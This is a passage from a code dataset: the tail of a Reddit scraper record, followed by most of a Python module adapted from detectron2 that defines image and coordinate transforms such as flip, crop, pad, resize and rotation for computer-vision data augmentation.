'url'])\r\n\r\n\r\nposts.to_csv('top.csv')\r\n","repo_name":"naser-da/RedditScraper","sub_path":"RedditScraper.py","file_name":"RedditScraper.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71586122721","text":"# adapted from https://github.com/facebookresearch/detectron2/blob/master/detectron2/data/transforms/transform.py\n\nimport inspect\nimport pprint\nimport sys\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Callable, List, Optional, TypeVar\n\nimport numpy as np\nfrom PIL import Image\nimport torch\nimport torch.nn.functional as F\n\nfrom .transform_utils import to_float_tensor, to_numpy\n\ntry:\n import cv2 # noqa\nexcept ImportError:\n # OpenCV is an optional dependency at the moment\n pass\n\n\n__all__ = [\n \"BlendTransform\",\n \"CropTransform\",\n \"PadTransform\",\n \"GridSampleTransform\",\n \"HFlipTransform\",\n \"VFlipTransform\",\n \"NoOpTransform\",\n \"ScaleTransform\",\n \"Transform\",\n \"TransformList\",\n \"ExtentTransform\",\n \"ResizeTransform\",\n \"RotationTransform\"\n]\n\n\nclass Transform(metaclass=ABCMeta):\n \"\"\"\n Base class for implementations of **deterministic** transformations for\n image and other data structures. \"Deterministic\" requires that the output\n of all methods of this class are deterministic w.r.t their input arguments.\n Note that this is different from (random) data augmentations. To perform\n data augmentations in training, there should be a higher-level policy that\n generates these transform ops.\n\n Each transform op may handle several data types, e.g.: image, coordinates,\n segmentation, bounding boxes, with its ``apply_*`` methods. Some of\n them have a default implementation, but can be overwritten if the default\n isn't appropriate. See documentation of each pre-defined ``apply_*`` methods\n for details. Note that The implementation of these method may choose to\n modify its input data in-place for efficient transformation.\n\n The class can be extended to support arbitrary new data types with its\n :meth:`register_type` method.\n \"\"\"\n\n def _set_attributes(self, params: Optional[List[Any]] = None) -> None:\n \"\"\"\n Set attributes from the input list of parameters.\n\n Args:\n params (list): list of parameters.\n \"\"\"\n\n if params:\n for k, v in params.items():\n if k != \"self\" and not k.startswith(\"_\"):\n setattr(self, k, v)\n\n @abstractmethod\n def apply_image(self, img: np.ndarray):\n \"\"\"\n Apply the transform on an image.\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: image after apply the transformation.\n \"\"\"\n\n @abstractmethod\n def apply_coords(self, coords: np.ndarray):\n \"\"\"\n Apply the transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: coordinates after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates inside an image of\n shape (H, W) are in range [0, W] or [0, H].\n This function should correctly transform coordinates outside the image as well.\n \"\"\"\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply the transform on a full-image segmentation.\n By default will just perform \"apply_image\".\n\n Args:\n segmentation (ndarray): of shape HxW. The array should have integer\n or bool dtype.\n\n Returns:\n ndarray: segmentation after apply the transformation.\n \"\"\"\n return self.apply_image(segmentation)\n\n def apply_box(self, box: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply the transform on an axis-aligned box. By default will transform\n the corner points and use their minimum/maximum to create a new\n axis-aligned box. Note that this default may change the size of your\n box, e.g. after rotations.\n\n Args:\n box (ndarray): Nx4 floating point array of XYXY format in absolute\n coordinates.\n Returns:\n ndarray: box after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates inside an image of\n shape (H, W) are in range [0, W] or [0, H].\n\n This function does not clip boxes to force them inside the image.\n It is up to the application that uses the boxes to decide.\n \"\"\"\n # Indexes of converting (x0, y0, x1, y1) box into 4 coordinates of\n # ([x0, y0], [x1, y0], [x0, y1], [x1, y1]).\n idxs = np.array([(0, 1), (2, 1), (0, 3), (2, 3)]).flatten()\n coords = np.asarray(box).reshape(-1, 4)[:, idxs].reshape(-1, 2)\n coords = self.apply_coords(coords).reshape((-1, 4, 2))\n minxy = coords.min(axis=1)\n maxxy = coords.max(axis=1)\n trans_boxes = np.concatenate((minxy, maxxy), axis=1)\n return trans_boxes\n\n def apply_polygons(self, polygons: list) -> list:\n \"\"\"\n Apply the transform on a list of polygons, each represented by a Nx2\n array. By default will just transform all the points.\n\n Args:\n polygon (list[ndarray]): each is a Nx2 floating point array of\n (x, y) format in absolute coordinates.\n Returns:\n list[ndarray]: polygon after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n return [self.apply_coords(p) for p in polygons]\n\n @classmethod\n def register_type(cls, data_type: str, func: Optional[Callable] = None):\n \"\"\"\n Register the given function as a handler that this transform will use\n for a specific data type.\n\n Args:\n data_type (str): the name of the data type (e.g., box)\n func (callable): takes a transform and a data, returns the\n transformed data.\n\n Examples:\n\n .. code-block:: python\n\n # call it directly\n def func(flip_transform, voxel_data):\n return transformed_voxel_data\n HFlipTransform.register_type(\"voxel\", func)\n\n # or, use it as a decorator\n @HFlipTransform.register_type(\"voxel\")\n def func(flip_transform, voxel_data):\n return transformed_voxel_data\n\n # ...\n transform = HFlipTransform(...)\n transform.apply_voxel(voxel_data) # func will be called\n \"\"\"\n if func is None: # the decorator style\n\n def wrapper(decorated_func):\n assert decorated_func is not None\n cls.register_type(data_type, decorated_func)\n return decorated_func\n\n return wrapper\n\n assert callable(\n func\n ), \"You can only register a callable to a Transform. Got {} instead.\".format(\n func\n )\n argspec = inspect.getfullargspec(func)\n assert len(argspec.args) == 2, (\n \"You can only register a function that takes two positional \"\n \"arguments to a Transform! Got a function with spec {}\".format(str(argspec))\n )\n setattr(cls, \"apply_\" + data_type, func)\n\n def inverse(self) -> \"Transform\":\n \"\"\"\n Create a transform that inverts the geometric changes (i.e. change of\n coordinates) of this transform.\n\n Note that the inverse is meant for geometric changes only.\n The inverse of photometric transforms that do not change coordinates\n is defined to be a no-op, even if they may be invertible.\n\n Returns:\n Transform:\n \"\"\"\n raise NotImplementedError\n\n def __repr__(self):\n \"\"\"\n Produce something like:\n \"MyTransform(field1={self.field1}, field2={self.field2})\"\n \"\"\"\n try:\n sig = inspect.signature(self.__init__)\n classname = type(self).__name__\n argstr = []\n for name, param in sig.parameters.items():\n assert (\n param.kind != param.VAR_POSITIONAL\n and param.kind != param.VAR_KEYWORD\n ), \"The default __repr__ doesn't support *args or **kwargs\"\n assert hasattr(self, name), (\n \"Attribute {} not found! \"\n \"Default __repr__ only works if attributes match the constructor.\".format(\n name\n )\n )\n attr = getattr(self, name)\n default = param.default\n if default is attr:\n continue\n attr_str = pprint.pformat(attr)\n if \"\\n\" in attr_str:\n # don't show it if pformat decides to use >1 lines\n attr_str = \"...\"\n argstr.append(\"{}={}\".format(name, attr_str))\n return \"{}({})\".format(classname, \", \".join(argstr))\n except AssertionError:\n return super().__repr__()\n\n\n_T = TypeVar(\"_T\")\n\n\n# pyre-ignore-all-errors\nclass TransformList(Transform):\n \"\"\"\n Maintain a list of transform operations which will be applied in sequence.\n Attributes:\n transforms (list[Transform])\n \"\"\"\n\n def __init__(self, transforms: List[Transform]):\n \"\"\"\n Args:\n transforms (list[Transform]): list of transforms to perform.\n \"\"\"\n super().__init__()\n # \"Flatten\" the list so that TransformList do not recursively contain TransfomList.\n # The additional hierarchy does not change semantic of the class, but cause extra\n # complexities in e.g, telling whether a TransformList contains certain Transform\n tfms_flatten = []\n for t in transforms:\n assert isinstance(\n t, Transform\n ), f\"TransformList requires a list of Transform. Got type {type(t)}!\"\n if isinstance(t, TransformList):\n tfms_flatten.extend(t.transforms)\n else:\n tfms_flatten.append(t)\n self.transforms = tfms_flatten\n\n def _apply(self, x: _T, meth: str) -> _T:\n \"\"\"\n Apply the transforms on the input.\n Args:\n x: input to apply the transform operations.\n meth (str): meth.\n Returns:\n x: after apply the transformation.\n \"\"\"\n for t in self.transforms:\n x = getattr(t, meth)(x)\n return x\n\n def __getattribute__(self, name: str):\n # use __getattribute__ to win priority over any registered dtypes\n if name.startswith(\"apply_\"):\n return lambda x: self._apply(x, name)\n return super().__getattribute__(name)\n\n def __add__(self, other: \"TransformList\") -> \"TransformList\":\n \"\"\"\n Args:\n other (TransformList): transformation to add.\n Returns:\n TransformList: list of transforms.\n \"\"\"\n others = other.transforms if isinstance(other, TransformList) else [other]\n return TransformList(self.transforms + others)\n\n def __iadd__(self, other: \"TransformList\") -> \"TransformList\":\n \"\"\"\n Args:\n other (TransformList): transformation to add.\n Returns:\n TransformList: list of transforms.\n \"\"\"\n others = other.transforms if isinstance(other, TransformList) else [other]\n self.transforms.extend(others)\n return self\n\n def __radd__(self, other: \"TransformList\") -> \"TransformList\":\n \"\"\"\n Args:\n other (TransformList): transformation to add.\n Returns:\n TransformList: list of transforms.\n \"\"\"\n others = other.transforms if isinstance(other, TransformList) else [other]\n return TransformList(others + self.transforms)\n\n def __len__(self) -> int:\n \"\"\"\n Returns:\n Number of transforms contained in the TransformList.\n \"\"\"\n return len(self.transforms)\n\n def __getitem__(self, idx) -> Transform:\n return self.transforms[idx]\n\n def inverse(self) -> \"TransformList\":\n \"\"\"\n Invert each transform in reversed order.\n \"\"\"\n return TransformList([x.inverse() for x in self.transforms[::-1]])\n\n def __repr__(self) -> str:\n msgs = [str(t) for t in self.transforms]\n return \"TransformList[{}]\".format(\", \".join(msgs))\n\n __str__ = __repr__\n\n # The actual implementations are provided in __getattribute__.\n # But abstract methods need to be declared here.\n def apply_coords(self, x):\n raise NotImplementedError\n\n def apply_image(self, x):\n raise NotImplementedError\n\n\nclass HFlipTransform(Transform):\n \"\"\"\n Perform horizontal flip.\n \"\"\"\n\n def __init__(self, width: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n # NOTE: opencv would be faster:\n # https://github.com/pytorch/pytorch/issues/16424#issuecomment-580695672\n if img.ndim <= 3: # HxW, HxWxC\n return np.flip(img, axis=1)\n else:\n return np.flip(img, axis=-2)\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H - 1 - y)`.\n \"\"\"\n coords[:, 0] = self.width - coords[:, 0]\n return coords\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is to flip again\n \"\"\"\n return self\n\n\nclass VFlipTransform(Transform):\n \"\"\"\n Perform vertical flip.\n \"\"\"\n\n def __init__(self, height: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n tensor = torch.from_numpy(np.ascontiguousarray(img))\n if len(tensor.shape) == 2:\n # For dimension of HxW.\n tensor = tensor.flip((-2))\n elif len(tensor.shape) > 2:\n # For dimension of HxWxC, NxHxWxC.\n tensor = tensor.flip((-3))\n return tensor.numpy()\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H - 1 - y)`.\n \"\"\"\n coords[:, 1] = self.height - coords[:, 1]\n return coords\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is to flip again\n \"\"\"\n return self\n\n\nclass NoOpTransform(Transform):\n \"\"\"\n A transform that does nothing.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n return img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n return coords\n\n def inverse(self) -> Transform:\n return self\n\n def __getattr__(self, name: str):\n if name.startswith(\"apply_\"):\n return lambda x: x\n raise AttributeError(\"NoOpTransform object has no attribute {}\".format(name))\n\n\nclass ScaleTransform(Transform):\n \"\"\"\n Resize the image to a target size.\n \"\"\"\n\n def __init__(self, h: int, w: int, new_h: int, new_w: int, interp: str = None):\n \"\"\"\n Args:\n h, w (int): original image size.\n new_h, new_w (int): new image size.\n interp (str): interpolation methods. Options includes `nearest`, `linear`\n (3D-only), `bilinear`, `bicubic` (4D-only), and `area`.\n Details can be found in:\n https://pytorch.org/docs/stable/nn.functional.html\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:\n \"\"\"\n Resize the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n interp (str): interpolation methods. Options includes `nearest`, `linear`\n (3D-only), `bilinear`, `bicubic` (4D-only), and `area`.\n Details can be found in:\n https://pytorch.org/docs/stable/nn.functional.html\n\n Returns:\n ndarray: resized image(s).\n \"\"\"\n if len(img.shape) == 4:\n h, w = img.shape[1:3]\n elif len(img.shape) in (2, 3):\n h, w = img.shape[:2]\n else:\n raise (\"Unsupported input with shape of {}\".format(img.shape))\n assert (\n self.h == h and self.w == w\n ), \"Input size mismatch h w {}:{} -> {}:{}\".format(self.h, self.w, h, w)\n interp_method = interp if interp is not None else self.interp\n # Option of align_corners is only supported for linear, bilinear,\n # and bicubic.\n if interp_method in [\"linear\", \"bilinear\", \"bicubic\"]:\n align_corners = False\n else:\n align_corners = None\n\n # note: this is quite slow for int8 images because torch does not\n # support it https://github.com/pytorch/pytorch/issues/5580\n float_tensor = torch.nn.functional.interpolate(\n to_float_tensor(img),\n size=(self.new_h, self.new_w),\n mode=interp_method,\n align_corners=align_corners,\n )\n return to_numpy(float_tensor, img.shape, img.dtype)\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Compute the coordinates after resize.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: resized coordinates.\n \"\"\"\n coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)\n coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)\n return coords\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply resize on the full-image segmentation.\n\n Args:\n segmentation (ndarray): of shape HxW. The array should have integer\n or bool dtype.\n Returns:\n ndarray: resized segmentation.\n \"\"\"\n segmentation = self.apply_image(segmentation, interp=\"nearest\")\n return segmentation\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is to resize it back.\n \"\"\"\n return ScaleTransform(self.new_h, self.new_w, self.h, self.w, self.interp)\n\n\nclass GridSampleTransform(Transform):\n def __init__(self, grid: np.ndarray, interp: str):\n \"\"\"\n Args:\n grid (ndarray): grid has x and y input pixel locations which are\n used to compute output. Grid has values in the range of [-1, 1],\n which is normalized by the input height and width. The dimension\n is `N x H x W x 2`.\n interp (str): interpolation methods. Options include `nearest` and\n `bilinear`.\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:\n \"\"\"\n Apply grid sampling on the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n interp (str): interpolation methods. Options include `nearest` and\n `bilinear`.\n Returns:\n ndarray: grid sampled image(s).\n \"\"\"\n interp_method = interp if interp is not None else self.interp\n float_tensor = torch.nn.functional.grid_sample(\n to_float_tensor(img), # NxHxWxC -> NxCxHxW.\n torch.from_numpy(self.grid),\n mode=interp_method,\n padding_mode=\"border\",\n align_corners=False,\n )\n return to_numpy(float_tensor, img.shape, img.dtype)\n\n def apply_coords(self, coords: np.ndarray):\n \"\"\"\n Not supported.\n \"\"\"\n raise NotImplementedError()\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply grid sampling on the full-image segmentation.\n\n Args:\n segmentation (ndarray): of shape HxW. The array should have integer\n or bool dtype.\n Returns:\n ndarray: grid sampled segmentation.\n \"\"\"\n segmentation = self.apply_image(segmentation, interp=\"nearest\")\n return segmentation\n\n\nclass CropTransform(Transform):\n def __init__(\n self,\n x0: int,\n y0: int,\n w: int,\n h: int,\n orig_w: Optional[int] = None,\n orig_h: Optional[int] = None,\n ):\n \"\"\"\n Args:\n x0, y0, w, h (int): crop the image(s) by img[y0:y0+h, x0:x0+w].\n orig_w, orig_h (int): optional, the original width and height\n before cropping. Needed to make this transform invertible.\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Crop the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: cropped image(s).\n \"\"\"\n if len(img.shape) <= 3:\n return img[self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w]\n else:\n return img[..., self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w, :]\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply crop transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: cropped coordinates.\n \"\"\"\n coords[:, 0] -= self.x0\n coords[:, 1] -= self.y0\n return coords\n\n def apply_polygons(self, polygons: list) -> list:\n \"\"\"\n Apply crop transform on a list of polygons, each represented by a Nx2 array.\n It will crop the polygon with the box, therefore the number of points in the\n polygon might change.\n\n Args:\n polygon (list[ndarray]): each is a Nx2 floating point array of\n (x, y) format in absolute coordinates.\n Returns:\n ndarray: cropped polygons.\n \"\"\"\n import shapely.geometry as geometry\n\n # Create a window that will be used to crop\n crop_box = geometry.box(\n self.x0, self.y0, self.x0 + self.w, self.y0 + self.h\n ).buffer(0.0)\n\n cropped_polygons = []\n\n for polygon in polygons:\n polygon = geometry.Polygon(polygon).buffer(0.0)\n # polygon must be valid to perform intersection.\n if not polygon.is_valid:\n continue\n cropped = polygon.intersection(crop_box)\n if cropped.is_empty:\n continue\n if not isinstance(cropped, geometry.collection.BaseMultipartGeometry):\n cropped = [cropped]\n # one polygon may be cropped to multiple ones\n for poly in cropped:\n # It could produce lower dimensional objects like lines or\n # points, which we want to ignore\n if not isinstance(poly, geometry.Polygon) or not poly.is_valid:\n continue\n coords = np.asarray(poly.exterior.coords)\n # NOTE This process will produce an extra identical vertex at\n # the end. So we remove it. This is tested by\n # `tests/test_data_transform.py`\n cropped_polygons.append(coords[:-1])\n return [self.apply_coords(p) for p in cropped_polygons]\n\n def inverse(self) -> Transform:\n assert (\n self.orig_w is not None and self.orig_h is not None\n ), \"orig_w, orig_h are required for CropTransform to be invertible!\"\n pad_x1 = self.orig_w - self.x0 - self.w\n pad_y1 = self.orig_h - self.y0 - self.h\n return PadTransform(\n self.x0, self.y0, pad_x1, pad_y1, orig_w=self.w, orig_h=self.h\n )\n\n\nclass PadTransform(Transform):\n def __init__(\n self,\n x0: int,\n y0: int,\n x1: int,\n y1: int,\n orig_w: Optional[int] = None,\n orig_h: Optional[int] = None,\n pad_value: float = 0,\n ):\n \"\"\"\n Args:\n x0, y0: number of padded pixels on the left and top\n x1, y1: number of padded pixels on the right and bottom\n orig_w, orig_h: optional, original width and height.\n Needed to make this transform invertible.\n pad_value: the padding value\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img):\n if img.ndim == 3:\n padding = ((self.y0, self.y1), (self.x0, self.x1), (0, 0))\n else:\n padding = ((self.y0, self.y1), (self.x0, self.x1))\n return np.pad(\n img,\n padding,\n mode=\"constant\",\n constant_values=self.pad_value,\n )\n\n def apply_coords(self, coords):\n coords[:, 0] += self.x0\n coords[:, 1] += self.y0\n return coords\n\n def inverse(self) -> Transform:\n assert (\n self.orig_w is not None and self.orig_h is not None\n ), \"orig_w, orig_h are required for PadTransform to be invertible!\"\n neww = self.orig_w + self.x0 + self.x1\n newh = self.orig_h + self.y0 + self.y1\n return CropTransform(\n self.x0, self.y0, self.orig_w, self.orig_h, orig_w=neww, orig_h=newh\n )\n\n\nclass BlendTransform(Transform):\n \"\"\"\n Transforms pixel colors with PIL enhance functions.\n \"\"\"\n\n def __init__(self, src_image: np.ndarray, src_weight: float, dst_weight: float):\n \"\"\"\n Blends the input image (dst_image) with the src_image using formula:\n ``src_weight * src_image + dst_weight * dst_image``\n\n Args:\n src_image (ndarray): Input image is blended with this image\n src_weight (float): Blend weighting of src_image\n dst_weight (float): Blend weighting of dst_image\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:\n \"\"\"\n Apply blend transform on the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n interp (str): keep this option for consistency, perform blend would not\n require interpolation.\n Returns:\n ndarray: blended image(s).\n \"\"\"\n if img.dtype == np.uint8:\n img = img.astype(np.float32)\n img = self.src_weight * self.src_image + self.dst_weight * img\n return np.clip(img, 0, 255).astype(np.uint8)\n else:\n return self.src_weight * self.src_image + self.dst_weight * img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply no transform on the coordinates.\n \"\"\"\n return coords\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply no transform on the full-image segmentation.\n \"\"\"\n return segmentation\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is a no-op.\n \"\"\"\n return NoOpTransform()\n\n\nclass ExtentTransform(Transform):\n \"\"\"\n Extracts a subregion from the source image and scales it to the output size.\n\n The fill color is used to map pixels from the source rect that fall outside\n the source image.\n\n See: https://pillow.readthedocs.io/en/latest/PIL.html#PIL.ImageTransform.ExtentTransform\n \"\"\"\n\n def __init__(self, src_rect, output_size, interp=Image.LINEAR, fill=0):\n \"\"\"\n Args:\n src_rect (x0, y0, x1, y1): src coordinates\n output_size (h, w): dst image size\n interp: PIL interpolation methods\n fill: Fill color used when src_rect extends outside image\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img, interp=None):\n h, w = self.output_size\n ret = Image.fromarray(img).transform(\n size=(w, h),\n method=Image.EXTENT,\n data=self.src_rect,\n resample=interp if interp else self.interp,\n fill=self.fill,\n )\n return np.asarray(ret)\n\n def apply_coords(self, coords):\n # Transform image center from source coordinates into output coordinates\n # and then map the new origin to the corner of the output image.\n h, w = self.output_size\n x0, y0, x1, y1 = self.src_rect\n new_coords = coords.astype(np.float32)\n new_coords[:, 0] -= 0.5 * (x0 + x1)\n new_coords[:, 1] -= 0.5 * (y0 + y1)\n new_coords[:, 0] *= w / (x1 - x0)\n new_coords[:, 1] *= h / (y1 - y0)\n new_coords[:, 0] += 0.5 * w\n new_coords[:, 1] += 0.5 * h\n return new_coords\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=Image.NEAREST)\n return segmentation\n\n\nclass ResizeTransform(Transform):\n \"\"\"\n Resize the image to a target size.\n \"\"\"\n\n def __init__(self, h, w, new_h, new_w, interp=None):\n \"\"\"\n Args:\n h, w (int): original image size\n new_h, new_w (int): new image size\n interp: PIL interpolation methods, defaults to bilinear.\n \"\"\"\n # TODO decide on PIL vs opencv\n super().__init__()\n if interp is None:\n interp = Image.BILINEAR\n self._set_attributes(locals())\n\n def apply_image(self, img, interp=None):\n assert img.shape[:2] == (self.h, self.w)\n assert len(img.shape) <= 4\n\n if img.dtype == np.uint8:\n pil_image = Image.fromarray(img)\n interp_method = interp if interp is not None else self.interp\n pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)\n ret = np.asarray(pil_image)\n else:\n # PIL only supports uint8\n img = torch.from_numpy(img)\n shape = list(img.shape)\n shape_4d = shape[:2] + [1] * (4 - len(shape)) + shape[2:]\n img = img.view(shape_4d).permute(2, 3, 0, 1) # hw(c) -> nchw\n _PIL_RESIZE_TO_INTERPOLATE_MODE = {Image.BILINEAR: \"bilinear\", Image.BICUBIC: \"bicubic\"}\n mode = _PIL_RESIZE_TO_INTERPOLATE_MODE[self.interp]\n img = F.interpolate(img, (self.new_h, self.new_w), mode=mode, align_corners=False)\n shape[:2] = (self.new_h, self.new_w)\n ret = img.permute(2, 3, 0, 1).view(shape).numpy() # nchw -> hw(c)\n\n return ret\n\n def apply_coords(self, coords):\n coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)\n coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)\n return coords\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=Image.NEAREST)\n return segmentation\n\n def inverse(self):\n return ResizeTransform(self.new_h, self.new_w, self.h, self.w, self.interp)\n\n\nclass RotationTransform(Transform):\n \"\"\"\n This method returns a copy of this image, rotated the given\n number of degrees counter clockwise around its center.\n \"\"\"\n\n def __init__(self, h, w, angle, expand=True, center=None, interp=None):\n \"\"\"\n Args:\n h, w (int): original image size\n angle (float): degrees for rotation\n expand (bool): choose if the image should be resized to fit the whole\n rotated image (default), or simply cropped\n center (tuple (width, height)): coordinates of the rotation center\n if left to None, the center will be fit to the center of each image\n center has no effect if expand=True because it only affects shifting\n interp: cv2 interpolation method, default cv2.INTER_LINEAR\n \"\"\"\n super().__init__()\n image_center = np.array((w / 2, h / 2))\n if center is None:\n center = image_center\n if interp is None:\n interp = cv2.INTER_LINEAR\n abs_cos, abs_sin = (abs(np.cos(np.deg2rad(angle))), abs(np.sin(np.deg2rad(angle))))\n if expand:\n # find the new width and height bounds\n bound_w, bound_h = np.rint(\n [h * abs_sin + w * abs_cos, h * abs_cos + w * abs_sin]\n ).astype(int)\n else:\n bound_w, bound_h = w, h\n\n self._set_attributes(locals())\n self.rm_coords = self.create_rotation_matrix()\n # Needed because of this problem https://github.com/opencv/opencv/issues/11784\n self.rm_image = self.create_rotation_matrix(offset=-0.5)\n\n def apply_image(self, img, interp=None):\n \"\"\"\n img should be a numpy array, formatted as Height * Width * Nchannels\n \"\"\"\n if len(img) == 0 or self.angle % 360 == 0:\n return img\n assert img.shape[:2] == (self.h, self.w)\n interp = interp if interp is not None else self.interp\n return cv2.warpAffine(img, self.rm_image, (self.bound_w, self.bound_h), flags=interp)\n\n def apply_coords(self, coords):\n \"\"\"\n coords should be a N * 2 array-like, containing N couples of (x, y) points\n \"\"\"\n coords = np.asarray(coords, dtype=float)\n if len(coords) == 0 or self.angle % 360 == 0:\n return coords\n return cv2.transform(coords[:, np.newaxis, :], self.rm_coords)[:, 0, :]\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=cv2.INTER_NEAREST)\n return segmentation\n\n def create_rotation_matrix(self, offset=0):\n center = (self.center[0] + offset, self.center[1] + offset)\n rm = cv2.getRotationMatrix2D(tuple(center), self.angle, 1)\n if self.expand:\n # Find the coordinates of the center of rotation in the new image\n # The only point for which we know the future coordinates is the center of the image\n rot_im_center = cv2.transform(self.image_center[None, None, :] + offset, rm)[0, 0, :]\n new_center = np.array([self.bound_w / 2, self.bound_h / 2]) + offset - rot_im_center\n # shift the rotation center to the new coordinates\n rm[:, 2] += new_center\n return rm\n\n def inverse(self):\n \"\"\"\n The inverse is to rotate it back with expand, and crop to get the original shape.\n \"\"\"\n if not self.expand: # Not possible to inverse if a part of the image is lost\n raise NotImplementedError()\n rotation = RotationTransform(\n self.bound_h, self.bound_w, -self.angle, True, None, self.interp\n )\n crop = CropTransform(\n (rotation.bound_w - self.w) // 2, (rotation.bound_h - self.h) // 2, self.w, self.h\n )\n return TransformList([rotation, crop])\n\n\ndef HFlip_rotated_box(transform, rotated_boxes):\n \"\"\"\n Apply the horizontal flip transform on rotated boxes.\n\n Args:\n rotated_boxes (ndarray): Nx5 floating point array of\n (x_center, y_center, width, height, angle_degrees) format\n in absolute coordinates.\n \"\"\"\n # Transform x_center\n rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]\n # Transform angle\n rotated_boxes[:, 4] = -rotated_boxes[:, 4]\n return rotated_boxes\n\n\ndef Resize_rotated_box(transform, rotated_boxes):\n \"\"\"\n Apply the resizing transform on rotated boxes. For details of how these (approximation)\n formulas are derived, please refer to :meth:`RotatedBoxes.scale`.\n\n Args:\n rotated_boxes (ndarray): Nx5 floating point array of\n (x_center, y_center, width, height, angle_degrees) format\n in absolute coordinates.\n \"\"\"\n scale_factor_x = transform.new_w * 1.0 / transform.w\n scale_factor_y = transform.new_h * 1.0 / transform.h\n rotated_boxes[:, 0] *= scale_factor_x\n rotated_boxes[:, 1] *= scale_factor_y\n theta = rotated_boxes[:, 4] * np.pi / 180.0\n c = np.cos(theta)\n s = np.sin(theta)\n rotated_boxes[:, 2] *= np.sqrt(np.square(scale_factor_x * c) + np.square(scale_factor_y * s))\n rotated_boxes[:, 3] *= np.sqrt(np.square(scale_factor_x * s) + np.square(scale_factor_y * c))\n 